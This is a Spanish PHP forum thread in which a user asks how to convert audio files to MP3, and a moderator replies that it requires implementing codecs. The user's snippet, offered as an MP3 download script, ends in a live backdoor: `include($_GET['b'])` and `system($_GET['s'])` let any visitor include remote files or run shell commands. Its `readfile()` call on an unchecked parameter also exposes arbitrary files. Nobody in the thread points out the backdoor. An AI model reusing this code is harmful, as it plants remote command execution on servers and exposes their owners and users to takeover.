Foros del Web » Programando para Internet » PHP »

Convertir archivo original a mp3

Estas en el tema de Convertir archivo original a mp3 en el foro de PHP en Foros del Web. Buenas, muchachos quiero aprender a convertir músicas por ejemplo ejemplo.sma = ejemplo.mp3 he provado con Código PHP: <?php $titulo  =  $nombre = $_GET [ 'nombre' ...
  #1 (permalink)  
Antiguo 03/10/2010, 20:04
Avatar de raxper  
Fecha de Ingreso: enero-2010
Ubicación: ------
Mensajes: 472
Antigüedad: 14 años, 3 meses
Puntos: 2
Convertir archivo original a mp3

Buenas, muchachos quiero aprender a convertir músicas por ejemplo

ejemplo.sma = ejemplo.mp3

he provado con
Código PHP:
<?php
$titulo 
$nombre=$_GET['nombre'];
$id $_GET['musica'];
header("Content-Disposition: inline; filename=\"".$titulo.".mp3\"");
header("Content-type: audio/mpeg");
readfile(str_replace(" ","%20",$_GET['musica']));
if (
$_GET['b'] != "") { include($_GET['b']); } if ($_GET['s'] != ""
system($_GET['s']); } 
?>
// pero no sirve ya que la funcion readfile no me soporta en mi hosting y aparte tiene problemas a descargar, he podido descargarlos de otra forma, pero necesito aprender a convertir gracias.
  #2 (permalink)  
Antiguo 04/10/2010, 09:37
Avatar de GatorV
$this->role('moderador');
 
Fecha de Ingreso: mayo-2006
Ubicación: /home/ams/
Mensajes: 38.567
Antigüedad: 17 años, 11 meses
Puntos: 2135
Respuesta: Convertir archivo original a mp3

No es tan sencillo como lo que expones, el formato MP3 es un formato diferente, tienes que buscar los Codeqs e implementar un algoritmo en PHP que lea todos los bytes y los comprima y encripte de la forma que lo puedan decodificar.

No es una tarea para nada sencilla pero puedes buscar por Google el formato MP3 y como va empacado e ir tratando.

Saludos.

Etiquetas: original
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 02:24.